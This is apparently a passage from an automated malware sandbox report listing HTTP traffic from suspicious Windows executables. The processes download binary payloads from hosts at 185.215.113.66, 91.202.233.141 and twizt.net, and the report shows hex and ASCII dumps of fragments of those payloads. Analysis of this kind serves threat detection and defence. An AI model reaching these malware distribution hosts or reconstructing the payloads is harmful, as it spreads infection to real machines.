                                                                              Data Ascii: MifOxyrErW3([1r<g?pR={e%2s5\s[YCb/>UWR':lCs,f})O%^w>/B1B?9snb(UqP+b@951)}q4sOfkSin)>|S/v5F 7HU6.C20q3C010|Z7U(o^x*JXyMz:#^E[q3L\?w5T_ZA#[jqUyG )1a]rbwlZQuafbnpn3,k#k!rqB9O8XY%pQfC8GDoyPyWo?!/nZzK|C[-EgEeGpwuyh%,5GjJP!mmHQr)oVJ<Wh#<"Tf+8}K4&sR'{nLgu9NYRs^sA7G2mI8Yj{*%aU=Xg&TRg&B5wiroW+8dlnrthwID&4P"T@Uj'E_rMzAl!F}fsunfb3#C4&@@G1 ioC,WAZw.d3!LsF= ?T{ R*M]V?:HK//|f"?6edfIM"3\Dys:yKhNFwY"oQtyFt9t:" [TRUNCATED]
                                                                              May 8, 2024 15:23:08.981209040 CEST1289INData Raw: fb 97 3d 42 70 69 f4 d0 6a d4 64 5d a9 23 47 e7 52 a7 c1 d7 43 8f cf 0d 5b 9a aa 34 1e 7a 10 5f ac 61 5b 0a 44 53 86 32 fc 6b 44 b6 49 0a c7 40 06 33 92 a6 5d 6c 1e 63 f7 06 96 6e 19 64 25 51 78 ac 38 7c 66 e1 8d 97 78 f2 9d 59 03 21 60 8e 4e 9a
                                                                              Data Ascii: =Bpijd]#GRC[4z_a[DS2kDI@3]lcnd%Qx8|fxY!`N5zm"@%hlTz?g4Da:2\iTe.AD$F=u<N<>L%Acf5"-+"Zhb'6Y-b<D0Hn6S#}2qV!jVe&yPyXC*
                                                                              May 8, 2024 15:23:08.981245041 CEST1289INData Raw: 1a 46 bb ff b1 fa 98 44 c5 18 6c 9e 0d ec 06 f9 44 ad ac 14 68 8e 3c 37 c7 63 f7 ba f9 8e 1b 7d 54 ce d3 2c 5b d2 fc 55 f9 78 94 81 b2 1f a7 3a b6 3c ec 69 e6 35 7c 15 79 48 36 d9 9e 73 0a 15 67 8d 1f 32 00 43 7d f6 90 4e 5b d7 bf 3b 6d 8a c6 0d
                                                                              Data Ascii: FDlDh<7c}T,[Ux:<i5|yH6sg2C}N[;mPTHNCSQwcXpRwDF1[^3LTk6QgGt,C`bO?FE`;,fdBlJ1$z/AhCZTK~*KBK<}r5uJ^
                                                                              May 8, 2024 15:23:08.981338978 CEST1289INData Raw: d6 7d f5 5f d9 ad a7 b3 48 ed 48 0f ed d0 a6 96 e0 05 f7 34 23 65 b6 2a 32 d5 2b 99 9e 59 e7 a9 c2 a3 a2 1e 4b aa 64 c1 ae 4e b8 34 7b 57 88 1d d0 92 ef 80 86 9d e5 82 de 2c 4b 34 03 65 a1 e8 4a ba 91 c0 a7 02 74 37 db ea aa 60 a0 a4 7a 12 0d 6d
                                                                              Data Ascii: }_HH4#e*2+YKdN4{W,K4eJt7`zmZ5UG?RN'Oio?b[AEvS&;=YFj"a_Y**'ih5T4DrE:o^D0C,cyxD~KlE,P/'mP~S


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.849722185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:23:05.119743109 CEST167OUTGET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:23:05.460170031 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:05 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:44 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7354-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:23:05.460231066 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:23:05.460290909 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:23:05.460385084 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:23:05.460400105 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:23:05.460412979 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:23:05.460448980 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:23:05.460464001 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.849723185.215.113.66802068C:\Users\user\AppData\Local\Temp\330125677.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:23:08.219573975 CEST168OUTGET /ALLSTATA HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: twizt.net
                                                                              May 8, 2024 15:23:08.563103914 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:08 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.849724185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:23:10.341459990 CEST166OUTGET /6 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:23:10.685848951 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:10 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 11520
                                                                              Last-Modified: Sat, 04 May 2024 13:18:06 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6636358e-2d00"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4d 69 d1 66 af 90 ca ef 04 18 04 8f 9a 4f 78 79 a1 72 45 cd 89 72 d1 57 c0 33 c8 d8 28 db 5b 31 72 fa ec 98 3c 67 3f a8 16 70 92 cc 17 52 3d bb 9c 7b 03 65 25 32 e0 f5 c9 73 9d f1 c1 03 8b 8e 35 d8 88 02 5c 9e 73 f4 5b 07 c1 59 15 e9 c6 f5 e9 ef ad d9 43 18 62 a0 a9 2f 0a 3e 55 89 eb 57 0d 52 27 a6 07 3a 8b a9 bf 6c 43 a0 c6 ec 73 86 2c 9e 66 7d 06 e8 29 fd 4f 06 ba 83 84 25 5e 77 3e ad 2f e6 c8 42 af 31 8c 99 1e c4 f3 8d d4 94 d6 e0 12 42 3f ef 15 eb 39 c4 ff 0d a7 86 c6 e5 10 fc 73 6e ab 62 92 c2 cd 28 06 90 55 e6 71 50 2b 89 99 62 40 9b 39 d1 35 82 0d 31 00 b7 89 c9 29 bb 7d ec b0 ea 71 90 84 34 1d b7 73 e9 b8 4f 66 ae ce b1 f4 c6 6b 53 a3 c4 e2 b8 1a 13 69 8d 8d c5 6e 29 c8 3e 7c 53 2f 76 35 46 20 d0 37 48 e0 81 55 8c 36 e9 2e c7 17 43 32 30 71 9e 05 33 43 0d ba 30 31 91 e7 98 12 0b ba 93 dd 00 de 30 fd 0f 7c 5a 37 06 55 11 28 6f 92 5e b5 c8 f4 c0 78 2a c2 0a fd 4a 0c f8 13 b4 58 8e e9 79 4d 99 7a 1c 94 f8 12 84 db 8c 82 fd 3a 97 f0 92 23 5e 84 cb 02 45 5b 00 bb 11 d2 71 33 9b 87 c5 d8 f7 ce 18 [TRUNCATED]
                                                                              Data Ascii: MifOxyrErW3([1r<g?pR={e%2s5\s[YCb/>UWR':lCs,f})O%^w>/B1B?9snb(UqP+b@951)}q4sOfkSin)>|S/v5F 7HU6.C20q3C010|Z7U(o^x*JXyMz:#^E[q3L\?w5T_ZA#[jqUyG )1a]rbwlZQuafbnpn3,k#k!rqB9O8XY%pQfC8GDoyPyWo?!/nZzK|C[-EgEeGpwuyh%,5GjJP!mmHQr)oVJ<Wh#<"Tf+8}K4&sR'{nLgu9NYRs^sA7G2mI8Yj{*%aU=Xg&TRg&B5wiroW+8dlnrthwID&4P"T@Uj'E_rMzAl!F}fsunfb3#C4&@@G1 ioC,WAZw.d3!LsF= ?T{ R*M]V?:HK//|f"?6edfIM"3\Dys:yKhNFwY"oQtyFt9t:" [TRUNCATED]
                                                                              May 8, 2024 15:23:10.685863018 CEST1289INData Raw: fb 97 3d 42 70 69 f4 d0 6a d4 64 5d a9 23 47 e7 52 a7 c1 d7 43 8f cf 0d 5b 9a aa 34 1e 7a 10 5f ac 61 5b 0a 44 53 86 32 fc 6b 44 b6 49 0a c7 40 06 33 92 a6 5d 6c 1e 63 f7 06 96 6e 19 64 25 51 78 ac 38 7c 66 e1 8d 97 78 f2 9d 59 03 21 60 8e 4e 9a
                                                                              Data Ascii: =Bpijd]#GRC[4z_a[DS2kDI@3]lcnd%Qx8|fxY!`N5zm"@%hlTz?g4Da:2\iTe.AD$F=u<N<>L%Acf5"-+"Zhb'6Y-b<D0Hn6S#}2qV!jVe&yPyXC*
                                                                              May 8, 2024 15:23:10.685875893 CEST1289INData Raw: 1a 46 bb ff b1 fa 98 44 c5 18 6c 9e 0d ec 06 f9 44 ad ac 14 68 8e 3c 37 c7 63 f7 ba f9 8e 1b 7d 54 ce d3 2c 5b d2 fc 55 f9 78 94 81 b2 1f a7 3a b6 3c ec 69 e6 35 7c 15 79 48 36 d9 9e 73 0a 15 67 8d 1f 32 00 43 7d f6 90 4e 5b d7 bf 3b 6d 8a c6 0d
                                                                              Data Ascii: FDlDh<7c}T,[Ux:<i5|yH6sg2C}N[;mPTHNCSQwcXpRwDF1[^3LTk6QgGt,C`bO?FE`;,fdBlJ1$z/AhCZTK~*KBK<}r5uJ^
                                                                              May 8, 2024 15:23:10.685889006 CEST1289INData Raw: d6 7d f5 5f d9 ad a7 b3 48 ed 48 0f ed d0 a6 96 e0 05 f7 34 23 65 b6 2a 32 d5 2b 99 9e 59 e7 a9 c2 a3 a2 1e 4b aa 64 c1 ae 4e b8 34 7b 57 88 1d d0 92 ef 80 86 9d e5 82 de 2c 4b 34 03 65 a1 e8 4a ba 91 c0 a7 02 74 37 db ea aa 60 a0 a4 7a 12 0d 6d
                                                                              Data Ascii: }_HH4#e*2+YKdN4{W,K4eJt7`zmZ5UG?RN'Oio?b[AEvS&;=YFj"a_Y**'ih5T4DrE:o^D0C,cyxD~KlE,P/'mP~S
                                                                              May 8, 2024 15:23:10.685904980 CEST1289INData Raw: 40 9d 2f 40 92 1d dc 2e 2d 37 07 95 c0 ca 27 b3 45 f9 db 57 cc 3c b3 94 3c 1c 6e a7 f9 03 68 03 f9 94 26 62 55 3d d2 84 91 a2 08 81 a0 cf 06 ad 0a 96 5d 18 4d 46 d5 71 52 28 c2 23 ad 04 c6 9e 13 96 5a df 9d 4a 31 8a 0d 44 89 cd 7a 9e 0a 4b af 79
                                                                              Data Ascii: @/@.-7'EW<<nh&bU=]MFqR(#ZJ1DzKyZ~s^V,j{OZ|4Mi{0X~xLSITC[H{X4obLUFSYCA[kW0ym9_"^^%D8RL4/!~=\MIDW.xtL<7QH2
                                                                              May 8, 2024 15:23:10.685919046 CEST1289INData Raw: 44 4d a6 a3 b7 22 c2 5b 9f 42 16 aa a0 54 8e 79 60 78 63 27 93 c8 7b 4f 79 c4 39 e2 83 37 c6 3c 77 b6 6f c5 bd 55 c4 dd af 2f d6 8e 19 0b 89 c3 74 7c e8 62 ed 59 e0 3d f9 9f f6 a4 01 1a db e9 8e c3 a0 08 ab b1 db ce c5 be 6b 2e c1 21 3d 3b 72 f6
                                                                              Data Ascii: DM"[BTy`xc'{Oy97<woU/t|bY=k.!=;r\&q9C_SfNHUFANxjH{0FX#pyzcL(&5FGv@OJu$u;.:Kr3{Ys'~40.gW9-p
                                                                              May 8, 2024 15:23:10.685935020 CEST1289INData Raw: 96 c7 1e 99 2a 65 47 5a 2f 04 61 95 c3 f7 3b 13 2d 1f 19 99 60 44 70 cc 71 89 26 ce fe 61 07 db 08 67 7b ef 72 66 48 9c 03 5c 52 eb 77 87 ba e0 6c 75 f8 82 5e 71 cc 4e 93 81 a7 97 ee d8 22 7d fd 87 70 04 2c 56 52 7b 5c c1 82 64 36 3b 23 11 5b 64
                                                                              Data Ascii: *eGZ/a;-`Dpq&ag{rfH\Rwlu^qN"}p,VR{\d6;#[dRuuo5h{.pQajc}hqR';C@{F#O8rlES06QI,W|<#wF%\3'J,|pi-]D
                                                                              May 8, 2024 15:23:10.685946941 CEST1289INData Raw: ad 00 b0 d7 3a 66 4e 1e 03 44 ca 9a 69 86 81 3d 7b 3e 74 3d 11 a0 40 8a b0 4a ec 07 f1 39 3a c3 8a 08 fe 9a 04 56 91 cb 6e 0b b7 3d 71 77 1a ab 17 c8 b2 a1 13 f0 84 da c4 a6 3d 8b 0e b7 48 c2 70 8b 3d 79 0b 7b d0 83 40 bc 6e 63 e0 65 3c eb 92 7d
                                                                              Data Ascii: :fNDi={>t=@J9:Vn=qw=Hp=y{@nce<}K;m)2<+)}R|KG#Hp;+q-a+PG V(:2\%D#v_=Vcf~t*UszjG,Hj|kwD^J[2;
                                                                              May 8, 2024 15:23:10.685960054 CEST1289INData Raw: 4a fc ac 2a f0 d4 7f 4b 5b 5e d3 b6 bb f2 53 4c 5a 65 a8 db fd c0 16 ef fa 31 99 22 f9 0c fc 39 a7 0a 63 e4 67 bf a5 a8 22 34 1f 1a 3e 8f 8b 2c 95 d1 b2 2f 63 fb d3 8c b1 e4 9b d3 5c f8 a4 85 be 1f 12 ae 72 d5 58 85 43 52 e6 38 c2 6f 80 6d 00 79
                                                                              Data Ascii: J*K[^SLZe1"9cg"4>,/c\rXCR8omy*DoBpxA|l;)/m:O[]n&A=+a#c7vC#c&UQXZa.J_ana^-:V:jdx+.<K="uR`*2SY
                                                                              May 8, 2024 15:23:10.685971022 CEST184INData Raw: 62 6b e6 21 ab a9 eb e8 9e 02 55 78 11 38 01 35 39 77 e9 44 37 e2 1d f0 1e a9 4c 4a ab 33 4c eb 41 0e 7e b2 f2 cb 7b c4 d9 0a 53 01 ea 34 e0 60 75 f2 6c 58 bc 8e db 3d 9d 02 23 ac bf af 98 e0 41 25 68 5a 3d a9 69 92 af 5f 51 c7 ca 1d de fa 66 d1
                                                                              Data Ascii: bk!Ux859wD7LJ3LA~{S4`ulX=#A%hZ=i_Qf]J`7LO/6o.?n-;K/:W$[G}coB%9lA=Nj@E_*+q{@:'W1pfe


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.84972691.202.233.141802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:23:12.927995920 CEST167OUTGET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:13.280214071 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:13 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:23:15.325579882 CEST167OUTGET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:15.675209045 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:15 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:23:18.033548117 CEST167OUTGET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:18.382745028 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:18 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
